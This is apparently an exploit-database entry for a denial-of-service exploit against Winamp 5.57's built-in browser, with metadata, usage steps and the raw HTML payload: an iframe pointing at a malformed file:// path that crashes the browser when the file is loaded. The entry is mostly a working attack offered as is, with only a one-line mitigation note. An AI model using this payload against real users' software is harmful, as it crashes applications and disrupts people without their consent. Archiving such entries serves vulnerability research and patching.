Winamp 5.57 (Browser) IE Denial of Service Exploit

vendor:

Winamp

by:

cr4wl3r

8,8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Winamp

Affected Version From: Winamp 5.57

Affected Version To: Winamp 5.57

Patch Exists: Yes

Related CWE: Unknown

CPE: winamp:winamp:5.57

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP (SP2)

Unknown

Winamp 5.57 (Browser) IE Denial of Service Exploit

This exploit is for Winamp 5.57 (Browser) IE Denial of Service. It can be triggered by changing the Winamp skin to Bento, pressing ALT + X to open the browser, and then dragging or loading a file to the browser. This exploit was coded by cr4wl3r and tested on Windows XP (SP2).

Mitigation:

Users should update to the latest version of Winamp to ensure they are not vulnerable to this exploit.

Source

Exploit-DB raw data:

<!--
#[+]---------------------------------------------------------------------------------[+]#
# Winamp 5.57 (Browser) IE Denial of Service Exploit
# Homepage: http://www.winamp.com/
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
# Tested Win xp(sp2)
# Greetz: no thanks :)
###########################################################
# Usage: change your winamp skin with bento, to open browser press ALT + X 
#        drag or load file to browser and keep smile :)
###########################################################
#[+]---------------------------------------------------------------------------------[+]#
##################################### Proud to be Muslim ###################################

-->


<iframe src="file://þ:/SOS">


<!--

HACKER CITY GORONTALO INDONESIA

-->